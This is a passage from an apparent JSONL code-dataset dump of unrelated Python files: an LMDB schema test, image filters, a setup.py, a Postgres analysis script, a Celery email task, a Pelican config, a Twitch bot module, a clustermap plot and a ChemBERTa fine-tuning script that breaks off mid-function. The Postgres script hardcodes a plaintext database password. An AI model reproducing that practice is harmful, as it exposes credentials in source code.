self.users.attach_index('idx5',\n self.idx_users_by_mrealm_authid,\n lambda user: (user.mrealm, user.authid),\n nullable=True)\n\n self.idx_users_by_mrealm_notnull_authid = zlmdb.MapUuidStringOid(7)\n self.users.attach_index('idx6',\n self.idx_users_by_mrealm_notnull_authid,\n lambda user: (user.mrealm_notnull, user.authid),\n nullable=False)\n","sub_path":"zlmdb/tests/_schema_py3.py","file_name":"_schema_py3.py","file_ext":"py","file_size_in_byte":10632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"543217134","text":"\"\"\"Exemplo de aplicação de realces.\"\"\"\nfrom PIL import Image, ImageEnhance\n\nimage = Image.open('beijo_menor.jpg')\n\nsaturation = ImageEnhance.Color(image)\ncontrast = ImageEnhance.Contrast(image)\nbrightness = ImageEnhance.Brightness(image)\nsharpness = ImageEnhance.Sharpness(image)\n\n\ndef duno_filtro(img):\n contrast = ImageEnhance.Contrast(img)\n contrastado = contrast.enhance(1.1)\n\n brightness = ImageEnhance.Brightness(contrastado)\n brilho = brightness.enhance(1.1)\n\n saturation = ImageEnhance.Color(brilho)\n saturada = saturation.enhance(1.3)\n\n vinheta = Image.open('vinheta.png')\n saturada.paste(vinheta, (0, 0), vinheta)\n\n 
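# passing vinheta as the third paste() argument makes PIL use the PNG's own\n    # alpha channel as the paste mask\n    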
saturada.save('beijo_editada.jpg')\n\n\nduno_filtro(image)\n","sub_path":"codigo/Live176/exemplos_dos_slides/exemplo_12.py","file_name":"exemplo_12.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"635030765","text":"# -*- coding: utf-8 -*-\n\n\"\"\"setup.py: setuptools control.\"\"\"\n\nimport re\nfrom setuptools import setup\n\nversion = re.search(\n r'^__version__\\s*=\\s*\"(.*)\"',\n open('urigui/uricli.py').read(),\n re.M\n).group(1)\n\nwith open(\"README.md\", \"rb\") as f:\n long_descr = f.read().decode(\"utf-8\")\n\nsetup(\n name=\"urigui\",\n packages=[\"urigui\"],\n entry_points={\n \"console_scripts\": ['uri = urigui.uricli:main']\n },\n version=version,\n description=\"Utility CLI for submitting solutions to URI Online Judge.\",\n long_description=long_descr,\n long_description_content_type='text/markdown',\n author=\"Marcus Vinicius\",\n author_email=\"viniips@hotmail.com\",\n install_requires=[\n \"docopt==0.6.2\",\n \"PyInquirer==1.0.2\",\n \"requests==2.20.0\",\n \"mechanicalSoup==0.11.0\",\n \"demjson==2.2.4\",\n \"websocket-client==0.53.0\"\n ],\n url=\"https://github.com/vininjr/uricli\",\n license='Apache 2.0'\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"64557297","text":"\nimport psycopg2 as pg\nfrom tkinter import ttk\nimport pyexcel\nimport os\nimport pandas as pd\nfrom pandas._libs.tslibs import timedeltas\nimport matplotlib\nfrom matplotlib import *\nimport webbrowser\nimport matplotlib.pyplot as plt\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport datetime\nimport pandas as pd\nfrom tkinter import messagebox\n\n\ndbname = 'postgres'\nhost = 'localhost'\nuser = 'postgres'\npassword = 'ZpZh2rgH'\n\nconn = pg.connect(dbname=dbname, host=host, user=user, password=password) #рисоединение к базе данных\nquery = \"\"\"SELECT \"Property_Name\", \"Class\"\n FROM \"Market_Share\"\n WHERE \"Agency\"= 'Colliers' ;\"\"\"\nwith conn:\n cur = conn.cursor()\n cur.execute(query) # выполнение SQL запроса\n colnames = [column[0] for column in cur.description]\n rows1 = cur.fetchall() # чтение данных, полученных при запросе к базе\n #rows1.insert(0,colnames)\ndf = pd.DataFrame(rows1)\n#print(df)\n\nquery2 = \"\"\"SELECT \"Property_Name\", \"Class\"\n FROM \"Market_Share\"\n WHERE \"Owner\"= 'O1 Properties' ;\"\"\"\nwith conn:\n cur = conn.cursor()\n cur.execute(query2) # выполнение SQL запроса\n colnames = [column[0] for column in cur.description]\n rows2 = cur.fetchall() # чтение данных, полученных при запросе к базе\n#print(rows2)\n\n\nquery3 = \"\"\"SELECT \"Agency\", \"Class\", \"Property_Name\", \"SQM\"::real, \"Year\"\n FROM \"Market_Share\"\n WHERE \"SQM\" NOT LIKE '%w/s' AND \"SQM\" NOT LIKE '%offices' \"\"\" #\"SQM\" ~ E'^\\\\d+$' AND #AND \"SQM\"::numeric\n\n\nquery4 = \"\"\"SELECT \"Property_Name\", \"SQM\", \"Year\", \"Quarter\" \n FROM \"Market_Share\"\n WHERE \"SQM\" LIKE '%w/s'\"\"\"\nwith conn:\n cur = conn.cursor()\n cur.execute(query4) # выполнение SQL запроса\n colnames = [column[0] for column in cur.description]\n rows3 = cur.fetchall() # чтение данных, полученных при запросе к базе\n #rows3.insert(0,colnames)\n df3 = pd.DataFrame(rows3)\n df3.columns = [colnames]\n\nprint(df3)\n\n\n\n#query5 = \"\"\"SELECT \"Agency\",\"City\", \"Property_Name\", 
\"SQM\"::real, \"Year\", \"Quarter\"\n #FROM \"Market_Share\"\n #WHERE \"SQM\" NOT LIKE '%w/s' AND \"SQM\" NOT LIKE '%offices' AND \"Agency\" LIKE 'KF' AND \"City\" LIKE 'Moscow' AND \"SQM\" IN\n #(SELECT \"SQM\" FROM \"Market_Share\" GROUP BY \"SQM\" HAVING count(*)>0)\"\"\" #LIKE (SELECT `column` FROM `table` GROUP BY `column` HAVING count(*)>1);\n\n\n#with conn:\n #cur = conn.cursor()\n #cur.execute(query5) # выполнение SQL запроса\n #colnames = [column[0] for column in cur.description]\n #rows3 = cur.fetchall() # чтение данных, полученных при запросе к базе\n #rows3.insert(0,colnames)\n #df5 = pd.DataFrame(rows3)\n #df5.columns = [colnames]\n\n#print(df5)\n\n\ndf1 = pd.read_excel('C:\\\\Users\\\\Public\\\\Перспектиные города.xlsx')\ndf1.plot(x='SAL', y='Sec', style='o')\nplt.show()\n","sub_path":"testing sql.py","file_name":"testing sql.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"559927875","text":"#!/usr/bin/python\nimport json\nimport sys\n\ndef get_benchmarks(filename):\n return json.load(open(filename))['benchmarks']\n\ndef get_score(results, baseline):\n score = 0\n for result, reference in zip(results, baseline):\n score += float(reference['real_time']) / result['real_time']\n if result['real_time'] > 10000:\n sys.exit(1)\n score /= len(baseline)\n return score\n\nif __name__ == '__main__':\n print(get_score(get_benchmarks(sys.argv[1]), get_benchmarks(sys.argv[2])))\n","sub_path":"CPP/05-meet-in-the-middle/scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"349201602","text":"from __future__ import absolute_import\n\nfrom django.core import mail\nfrom celery import shared_task\nfrom radius.celery import app\nimport random\nfrom apps.accounts.models import EmailUser\nfrom django.core.mail import EmailMultiAlternatives, get_connection\nfrom django.template.loader import render_to_string\nfrom celery.exceptions import SoftTimeLimitExceeded\n\n# What to do about max-retries\n@shared_task(bind=True, max_retries=0, rate_limit='1/s', time_limit=10)\ndef task_send_test_email(self, user_id):\n user = EmailUser.objects.get(id=user_id)\n try:\n connection = get_connection(\n backend='django.core.mail.backends.smtp.EmailBackend',\n host=user.smtp_host,\n port='587',\n username=user.smtp_user,\n password=user.smtp_credentials,\n use_tls=True\n )\n\n template_html = 'test/test_smtp.html',\n template_text = 'test/test_smtp.txt',\n body_html = render_to_string(template_html)\n body_text = render_to_string(template_text)\n\n msg = EmailMultiAlternatives(\n subject='CurrentClient Test Email',\n body='If you got this, i think it worked.',\n from_email=user.smtp_user,\n to=[user.smtp_user],\n connection=connection)\n\n msg.attach_alternative(body_html, \"text/html\")\n msg.mixed_subtype = 'related'\n\n msg.send()\n return 'good'\n except SoftTimeLimitExceeded as e:\n print('timeout--exceeded, user > ', user.id)\n return e\n except Exception as e:\n print('______fail', e)\n return e\n","sub_path":"apps/accounts/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"321543004","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = 'Brandon Brown'\nSITENAME = 'Δ ℚuantitative √ourney'\nSITEURL = 
'http://outlace.com'\n\nPATH = 'content'\n\nTIMEZONE = 'America/Los_Angeles'\n\nDEFAULT_LANG = 'en'\n\n# Feed generation is usually not desired when developing\n#FEED_ALL_RSS = 'feeds/all.rss.xml'\n#CATEGORY_FEED_RSS = 'feeds/%s.rss.xml'\nFEED_ALL_ATOM = 'feeds/all.atom.xml'\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\n'''LINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'),\n ('You can modify those links in your config file', '#'),)'''\n\n# Social widget\n'''SOCIAL = (('twitter', 'http://twitter.com/ametaireau'),\n ('lastfm', 'http://lastfm.com/user/akounet'),\n ('github', 'http://github.com/ametaireau'),)'''\n\nDEFAULT_PAGINATION = 6\nDEFAULT_ORPHANS = 0\nPAGINATION_PATTERNS = (\n (1, '{base_name}/', '{base_name}/index.html'),\n (2, '{base_name}/page/{number}/', '{base_name}/page/{number}/index.html'),\n)\n\nTHEME = 'blue-penguin'\n\nMARKUP = ('md', 'ipynb')\n\nSTATIC_PATHS = ['images', 'pdfs', 'pages', 'js', 'extra/CNAME', 'notebooks']\nEXTRA_PATH_METADATA = {'extra/CNAME': {'path': 'CNAME'},}\nSTATIC_IMG = 'images'\nCONTACT_EMAIL = 'outlacedev@gmail.com'\n\nPLUGIN_PATHS = ['./plugins']\nPLUGINS = ['ipynb.markup', 'render_math', 'pelican_alias']\nIPYNB_USE_META_SUMMARY = True\nIGNORE_FILES = ['.ipynb_checkpoints', '__pycache__']\n\nDISPLAY_PAGES_ON_MENU = True\nDISQUS_SITENAME = \"outlace\"\nGOOGLE_ANALYTICS = 'UA-65814776-1'\nGITHUB_URL = 'http://github.com/outlace'\n# Uncomment following line if you want document-relative URLs when developing\nRELATIVE_URLS = False\nTYPOGRIFY = False\nTYPOGRIFY_IGNORE_TAGS = ['h2', 'article', 'a']\nCSS_FILE = 'main.css'\nSUMMARY_MAX_LENGTH = 250\n\n\n#### BLUE-PENGUIN THEME SETTINGS ########\n\n# all the following settings are *optional*\n\n# all defaults to True.\nDISPLAY_HEADER = True\nDISPLAY_FOOTER = True\nDISPLAY_HOME = True\nDISPLAY_MENU = True\n\n# provided as examples, they make ‘clean’ urls. 
used by MENU_INTERNAL_PAGES.\n'''TAGS_URL = 'tags'\nTAGS_SAVE_AS = 'tags/index.html'\nAUTHORS_URL = 'authors'\nAUTHORS_SAVE_AS = 'authors/index.html'\nCATEGORIES_URL = 'categories'\nCATEGORIES_SAVE_AS = 'categories/index.html'\nARCHIVES_URL = 'archives'\nARCHIVES_SAVE_AS = 'archives/index.html'''\n\nTAG_URL = 'tag/{slug}/'\nTAG_SAVE_AS = 'tag/{slug}/index.html'\nTAGS_URL = 'tags/'\nTAGS_SAVE_AS = 'tags/index.html'\n\nAUTHOR_URL = 'author/{slug}/'\nAUTHOR_SAVE_AS = 'author/{slug}/index.html'\nAUTHORS_URL = 'authors/'\nAUTHORS_SAVE_AS = 'authors/index.html'\n\nCATEGORY_URL = 'category/{slug}/'\nCATEGORY_SAVE_AS = 'category/{slug}/index.html'\nCATEGORIES_URL = 'categories/'\nCATEGORIES_SAVE_AS = 'categories/index.html'\n\nARCHIVES_URL = 'archives/{slug}/'\nARCHIVES_SAVE_AS = 'archives/{slug}/index.html'\n\n# use those if you want pelican standard pages to appear in your menu\nMENU_INTERNAL_PAGES = (\n #('About', AUTHORS_URL, AUTHORS_SAVE_AS),\n ('Tags', TAGS_URL, TAGS_SAVE_AS),\n ('Categories', CATEGORIES_URL, CATEGORIES_SAVE_AS),\n ('Archives', ARCHIVES_URL, ARCHIVES_SAVE_AS),\n)\n# additional menu items\nMENUITEMS = (\n #('GitHub', 'https://github.com/outlace'),\n)\n\nSITESUBTITLE = '∑ Our experiences in learning quantitative applications'\n\n#FAVICON = 'images/Deep_learning_icon.png'\n#ICON = 'images/Deep_learning_icon.png'\n","sub_path":"pelican/pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"473331205","text":"\n\n \nresult = [\n ['姓名', '性别', '年龄'],\n ['张三11111111111111111', '男', 186],\n ['李四', '男', 18],\n ['小花', '女', 16],\n ['梅梅', '女', 14],\n ]\n\ndef len_byte(value):\n print(value.encode('utf-8'))\n length = len(value)\n utf8_length = len(value.encode('utf-8'))\n print(length,utf8_length)\n length = (utf8_length - length) / 2 + length\n return int(length)\n\ncol_width = []\nfor i in range(len(result)):\n for j in range(len(result[i])):\n if i == 0:\n col_width.append(len_byte(result[i][j]))\n else:\n if col_width[j] < len_byte(str(result[i][j])):\n col_width[j] = len_byte(result[i][j])\n\n\nprint(col_width)","sub_path":"tmptest.py","file_name":"tmptest.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"310539087","text":"import json\n\nfrom utilities import messagetypes\nfrom modules.utilities.twitchviewer import TwitchViewer\n\n# DEFAULT MODULE VARIABLES\npriority = 5\ninterpreter = None\nclient = None\n\n# MODULE SPECIFIC VARIABLES\ntwitchviewer = None\ntwitch_cfg = \"twitch_data\"\n\n# HELPER FUNCTIONS\ndef get_configuration():\n\ttry:\n\t\tfile = open(twitch_cfg, \"r\")\n\t\tcfg = json.load(file)\n\t\tfile.close()\n\t\treturn cfg\n\texcept FileNotFoundError: return {}\n\ndef check_active_viewer():\n\tglobal twitchviewer\n\tif twitchviewer is not None and twitchviewer.is_alive: return True\n\ttwitchviewer = None\n\treturn False\n\n# MODULE COMMANDS\ndef command_twitch(arg, argc, limit=False):\n\tglobal twitchviewer\n\tif argc == 1:\n\t\tif not check_active_viewer():\n\t\t\ttwitchviewer = TwitchViewer(client, get_configuration(), arg[0])\n\t\t\ttwitchviewer.set_limited(limit)\n\t\t\ttwitchviewer.chat.set_command_queue_callback(interpreter.queue.put_nowait)\n\t\t\treturn messagetypes.Reply(\"Twitch viewer for '\"+ arg[0] + \"' started\")\n\t\telse: return messagetypes.Reply(\"Twitch viewer already open, close that one first\")\n\ndef 
command_twitch_limited(arg, argc):\n\tif argc == 1: return command_twitch(arg, argc, limit=True)\n\ndef command_twitch_reload(arg, argc):\n\tif argc == 0:\n\t\tif check_active_viewer():\n\t\t\ttwitchviewer.set_configuration(get_configuration())\n\t\t\treturn messagetypes.Reply(\"Twitch configuration reloaded\")\n\t\treturn messagetypes.Reply(\"No twitch viewer open\")\n\ndef command_twitch_trigger_enable(arg, argc):\n\tif argc == 1:\n\t\tif check_active_viewer():\n\t\t\ttwitchviewer.chat.enable_triggers = True\n\t\t\treturn messagetypes.Reply(\"Command triggers enabled\")\n\ndef command_twitch_trigger_disable(arg, argc):\n\tif argc == 1:\n\t\tif check_active_viewer():\n\t\t\ttwitchviewer.chat.enable_triggers = False\n\t\t\treturn messagetypes.Reply(\"Command triggers disabled\")\n\ndef command_twitch_say(arg, argc):\n\tif argc > 0:\n\t\tif check_active_viewer():\n\t\t\ttwitchviewer.chat.send_message(\" \".join(arg))\n\t\t\treturn messagetypes.Reply(\"Message sent\")\n\t\treturn messagetypes.Reply(\"No twitch viewer open\")\n\ncommands = {\n\t\"twitch\": {\n\t\t\"\": command_twitch,\n\t\t\"limited\": command_twitch_limited,\n\t\t\"reload\": command_twitch_reload,\n\t\t\"trigger\": {\n\t\t\t\"disable\": command_twitch_trigger_disable,\n\t\t\t\"enable\": command_twitch_trigger_enable\n\t\t}, \"say\": command_twitch_say\n\t}\n}","sub_path":"modules/twitch.py","file_name":"twitch.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"287862681","text":"def IntermediateTable(list1,symbol_table,label_table,lit_table):\n list2 = list1 \n reg32 = ['eax','ecx','edx','ebx','esp','ebp','esi','edi']\n reg32_1 = ['eax,','ecx,','edx,','ebx,','esp,','ebp,','esi,','edi,']\n for i in range(len(list1)):\n for j in range(len(list1[i])):\n temp = list2[i][j]\n if temp in reg32:\n list2[i][j] = 'reg#' + str(reg32.index(temp) + 1)\n if temp in reg32_1:\n list2[i][j] = 'reg#' + str(reg32_1.index(temp) + 1) + ','\n for k in range(len(symbol_table)):\n if temp == symbol_table[k][1]:\n list2[i][j] = 'sym#' + str(k+1)\n for k in range(len(label_table)):\n if (temp == label_table[k][2]) or (temp == label_table[k][2] + ':'):\n list2[i][j] = label_table[k][1]\n for k in range(len(lit_table)):\n if temp == lit_table[k][2]:\n list2[i][j] = lit_table[k][1]\n \n with open('IntermediateTable.txt','w+') as f:\n for i in range(len(list2)):\n list2[i] = ' '.join(list2[i]) + '\\n'\n f.write(list2[i])\n \n","sub_path":"IntermediateTable.py","file_name":"IntermediateTable.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"313862258","text":"import matplotlib\nmatplotlib.use('Agg')\nimport pylab as plt\nimport numpy as np\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.patches as mpatches\nfrom sklearn import preprocessing\nimport scipy\nimport os\n\n#cmap = sns.light_palette('brown', as_cmap=True)\ncmap = matplotlib.colors.ListedColormap(sns.color_palette('coolwarm', 1000))\n\n\ndef clustermap(inF, inF2, xLabel=True, yLabel=True, yLabelSize=8, xLabelSize=8):\n SigGene = []\n inFile = open(inF2)\n head = inFile.readline()\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n k = fields[1] + ':' + fields[3][1:]\n SigGene.append(k)\n print(fields[2])\n inFile.close()\n \n df = pd.read_table(inF, header=0)\n df_sig = df.ix[df.ix[:,0].isin(SigGene),:]\n\n PSIidx = -1\n for item in df_sig.columns:\n if 
item[-4:] == '_PSI':\n PSIidx += 1\n break\n else:\n PSIidx += 1\n print(PSIidx)\n mat = df_sig.ix[:,PSIidx:df_sig.shape[1]] \n\n CL = [x.split('_PSI')[0] for x in mat.columns]\n mat.columns = CL\n mat.columns.name=None\n\n COL_COLORS= []\n\n for sample in mat.columns:\n #if sample in ['B498','B499','B500', 'B502', 'B509']:\n # COL_COLORS.append('r')\n #elif sample in ['B505','B506','B507','B508']:\n # COL_COLORS.append('m')\n #elif sample in ['B501', 'B503','B504']:\n # COL_COLORS.append('g')\n if sample.find('Het') != -1:\n COL_COLORS.append('r')\n else:\n COL_COLORS.append('b')\n\n if yLabel:\n mat.index = df_sig.ix[:,5]\n mat.index.name = None\n\n #mat.to_csv(inF + '.txt',sep='\\t', index=True, header=True, float_format='%.2f')\n \n #row_linkage = scipy.cluster.hierarchy.linkage(mat).clip(0)\n #col_linkage = scipy.cluster.hierarchy.linkage(mat.T).clip(0)\n\n #cm =sns.clustermap(mat, col_cluster=True,row_cluster=True, linewidths=0, standard_scale=0, cmap = cmap, row_linkage=row_linkage, col_linkage=col_linkage)\n cm =sns.clustermap(mat, col_cluster=True,row_cluster=True, linewidths=0, standard_scale=0, cmap = cmap, col_colors=COL_COLORS)\n #cm =sns.clustermap(mat, col_cluster=True,row_cluster=True, linewidths=0, z_score=0, cmap = cmap, col_colors=COL_COLORS)\n\n \n hm = cm.ax_heatmap.get_position()\n rd = cm.ax_row_dendrogram.get_position()\n cd = cm.ax_col_dendrogram.get_position()\n ca = cm.cax.get_position()\n cc = cm.ax_col_colors.get_position()\n \n if not xLabel:\n cm.ax_heatmap.set_xticklabels('')\n if not yLabel:\n cm.ax_heatmap.set_yticklabels('')\n \n cm.ax_heatmap.set_position([hm.x0-0.05, hm.y0+0.05, hm.width, hm.height])\n cm.ax_col_dendrogram.set_position([cd.x0-0.05, cd.y0+0.05, cd.width, cd.height])\n cm.ax_row_dendrogram.set_position([rd.x0-0.05, rd.y0+0.05, rd.width, rd.height])\n cm.cax.set_position([ca.x0-0.05, ca.y0+0.05, ca.width, ca.height])\n cm.ax_col_colors.set_position([cc.x0-0.05, cc.y0 + 0.05, cc.width, cc.height])\n\n cm.cax.yaxis.set_label_text('standardized PSI')\n plt.setp(cm.ax_heatmap.yaxis.get_majorticklabels(), fontsize=yLabelSize, rotation=0)\n plt.setp(cm.ax_heatmap.xaxis.get_majorticklabels(), rotation=90, fontsize=xLabelSize)\n\n LEGEND = []\n #LEGEND.append(mpatches.Patch(color='r', label='R636Shom'))\n #LEGEND.append(mpatches.Patch(color='m', label='R636Shet'))\n #LEGEND.append(mpatches.Patch(color='g', label='KOhet'))\n #LEGEND.append(mpatches.Patch(color='b', label='WT'))\n LEGEND.append(mpatches.Patch(color='r', label='Het'))\n LEGEND.append(mpatches.Patch(color='b', label='WT'))\n cm.ax_heatmap.legend(handles = LEGEND, bbox_to_anchor=[-0.08, 0.02], loc='upper right')\n\n plt.savefig(inF2.split('.txt')[0] + '_Clustermap.pdf')\n\nclustermap('DCM_WTC_Exons_IRER.psi', inF2='DCM_WTC_DEXSeq_Sig_exonBaseMean64_PSI0.1_TopExon.txt', xLabel=True, yLabel=True, yLabelSize=20, xLabelSize=12)\n","sub_path":"DEXSeqPSI/14-Clustermap.py","file_name":"14-Clustermap.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"87557022","text":"\"\"\"Script for finetuning and evaluating pre-trained ChemBERTa models on MoleculeNet tasks.\n\n[classification]\npython finetune.py --datasets=bbbp --pretrained_model_name_or_path=DeepChem/ChemBERTa-SM-015\n\n[regression]\npython finetune.py --datasets=delaney --pretrained_model_name_or_path=DeepChem/ChemBERTa-SM-015\n\n[csv]\npython finetune.py --datasets=$HOME/finetune_datasets/logd/ \\\n --dataset_types=regression \\\n 
--pretrained_model_name_or_path=DeepChem/ChemBERTa-SM-015 \\\n --is_molnet=False\n\n[multiple]\npython finetune.py \\\n--datasets=bace_classification,bace_regression,bbbp,clearance,clintox,delaney,lipo,tox21 \\\n--pretrained_model_name_or_path=DeepChem/ChemBERTa-SM-015 \\\n--n_trials=20 \\\n--output_dir=finetuning_experiments \\\n--run_name=sm_015\n\n[from scratch (no pretraining)]\npython finetune.py --datasets=bbbp\n\n\"\"\"\nimport json\nimport os\nimport shutil\nimport subprocess\nimport tempfile\nfrom collections import OrderedDict\nfrom glob import glob\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport torch\nfrom absl import app, flags\nfrom scipy.special import softmax\nfrom scipy.stats import pearsonr\nfrom sklearn.metrics import (\n average_precision_score,\n matthews_corrcoef,\n mean_squared_error,\n roc_auc_score,\n)\nfrom transformers import RobertaConfig, RobertaTokenizerFast, Trainer, TrainingArguments\nfrom transformers.trainer_callback import EarlyStoppingCallback\n\nfrom chemberta.finetune.utils import (\n get_finetune_datasets,\n get_latest_checkpoint,\n prune_state_dict,\n)\nfrom chemberta.utils.cloud import check_cloud, sync_with_s3\nfrom chemberta.utils.molnet_dataloader import get_dataset_info\nfrom chemberta.utils.roberta_regression import (\n RobertaForRegression,\n RobertaForSequenceClassification,\n)\n\nFLAGS = flags.FLAGS\n\n# Settings\nflags.DEFINE_string(name=\"output_dir\", default=\"default_dir\", help=\"\")\nflags.DEFINE_boolean(name=\"overwrite_output_dir\", default=True, help=\"\")\nflags.DEFINE_integer(name=\"seed\", default=0, help=\"Global random seed.\")\n\n# Model params\nflags.DEFINE_list(\n name=\"pretrained_paths\",\n default=None,\n help=\"list of pretrained models. can be local or cloud\",\n)\nflags.DEFINE_list(\n name=\"model_names\", default=None, help=\"list of names to assign to each model run\"\n)\nflags.DEFINE_boolean(\n name=\"is_molnet\",\n default=True,\n help=\"If true, assumes all datasets are MolNet datasets.\",\n)\n\n# Train params\nflags.DEFINE_integer(name=\"logging_steps\", default=10, help=\"\")\nflags.DEFINE_integer(name=\"early_stopping_patience\", default=5, help=\"\")\nflags.DEFINE_integer(name=\"per_device_train_batch_size\", default=64, help=\"\")\nflags.DEFINE_integer(name=\"per_device_eval_batch_size\", default=64, help=\"\")\nflags.DEFINE_integer(\n name=\"n_trials\",\n default=5,\n help=\"Number of different hyperparameter combinations to try. Each combination will result in a different finetuned model.\",\n)\nflags.DEFINE_integer(\n name=\"n_seeds\",\n default=5,\n help=\"Number of unique random seeds to try. This only applies to the final best model selected after hyperparameter tuning.\",\n)\nflags.DEFINE_integer(\n name=\"save_total_limit\",\n default=3,\n help=\"Total number of checkpoints to save per model configuration.\",\n)\n\n# Dataset params\nflags.DEFINE_list(\n name=\"datasets\",\n default=None,\n help=\"Comma-separated list of MoleculeNet dataset names.\",\n)\nflags.DEFINE_string(\n name=\"split\", default=\"scaffold\", help=\"DeepChem data loader split_type.\"\n)\nflags.DEFINE_list(\n name=\"dataset_types\",\n default=None,\n help=\"List of dataset types (ex: classification,regression). 
Include 1 per dataset, not necessary for MoleculeNet datasets.\",\n)\n\n# Tokenizer params\nflags.DEFINE_string(\n name=\"tokenizer_path\",\n default=\"seyonec/SMILES_tokenized_PubChem_shard00_160k\",\n help=\"\",\n)\nflags.DEFINE_integer(name=\"max_tokenizer_len\", default=512, help=\"\")\n\nflags.mark_flag_as_required(\"datasets\")\nflags.mark_flag_as_required(\"pretrained_paths\")\n\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\nos.environ[\"WANDB_DISABLED\"] = \"true\"\n\n\ndef main(argv):\n is_molnet = FLAGS.is_molnet\n\n for i, pretrained_model_dir in enumerate(FLAGS.pretrained_paths):\n if FLAGS.model_names is not None:\n model_name = FLAGS.model_names[i]\n else:\n model_name = f\"model_{i}\"\n # Check that CSV dataset has the proper flags\n if not is_molnet:\n print(\"Assuming each dataset is a folder containing CSVs...\")\n assert (\n len(FLAGS.dataset_types) > 0\n ), \"Please specify dataset types for csv datasets\"\n for dataset_folder in FLAGS.datasets:\n assert os.path.exists(os.path.join(dataset_folder, \"train.csv\"))\n assert os.path.exists(os.path.join(dataset_folder, \"valid.csv\"))\n assert os.path.exists(os.path.join(dataset_folder, \"test.csv\"))\n\n for i in range(len(FLAGS.datasets)):\n dataset_name_or_path = FLAGS.datasets[i]\n dataset_name = get_dataset_name(dataset_name_or_path)\n dataset_type = (\n get_dataset_info(dataset_name)[\"dataset_type\"]\n if is_molnet\n else FLAGS.dataset_types[i]\n )\n\n run_dir = os.path.join(FLAGS.output_dir, model_name, dataset_name)\n\n if os.path.exists(run_dir) and not FLAGS.overwrite_output_dir:\n print(f\"Run dir already exists for dataset: {dataset_name}\")\n else:\n print(f\"Finetuning on {dataset_name}\")\n finetune_model_on_single_dataset(\n pretrained_model_dir,\n dataset_name_or_path,\n dataset_type,\n run_dir,\n is_molnet,\n )\n\n\ndef check_cloud(path: str):\n \"\"\"Naive check to if the path is a cloud path\"\"\"\n if path.startswith(\"s3:\"):\n return True\n return False\n\n\ndef sync_with_s3(source_dir: str, target_dir: str):\n \"\"\"Sync source_dir directory with target_dir\"\"\"\n subprocess.check_call(\n [\n \"aws\",\n \"s3\",\n \"sync\",\n source_dir,\n target_dir,\n \"--acl\",\n \"bucket-owner-full-control\",\n \"--delete\",\n ]\n )\n return\n\n\ndef get_latest_checkpoint(saved_model_dir):\n \"\"\"Get the folder for the latest checkpoint\"\"\"\n iters = [\n int(x.split(\"-\")[-1]) for x in os.listdir(saved_model_dir) if \"checkpoint\" in x\n ]\n iters.sort()\n latest_checkpoint_dir = os.path.join(saved_model_dir, f\"checkpoint-{iters[-1]}\")\n return latest_checkpoint_dir\n\n\ndef prune_state_dict(model_dir):\n \"\"\"Remove problematic keys from state dictionary\"\"\"\n if not (model_dir and os.path.exists(os.path.join(model_dir, \"pytorch_model.bin\"))):\n return None\n\n state_dict_path = os.path.join(model_dir, \"pytorch_model.bin\")\n assert os.path.exists(\n state_dict_path\n ), f\"No `pytorch_model.bin` file found in {model_dir}\"\n loaded_state_dict = torch.load(state_dict_path)\n state_keys = loaded_state_dict.keys()\n keys_to_remove = [\n k for k in state_keys if k.startswith(\"regression\") or k.startswith(\"norm\")\n ]\n\n new_state_dict = OrderedDict({**loaded_state_dict})\n for k in keys_to_remove:\n del new_state_dict[k]\n return new_state_dict\n\n\ndef finetune_model_on_single_dataset(\n pretrained_model_dir: str,\n dataset_name: str,\n dataset_type: str,\n run_dir: str,\n is_molnet: bool,\n use_final: bool = False,\n):\n \"\"\"Pretrains a single model on a single dataset\n\n Args:\n 
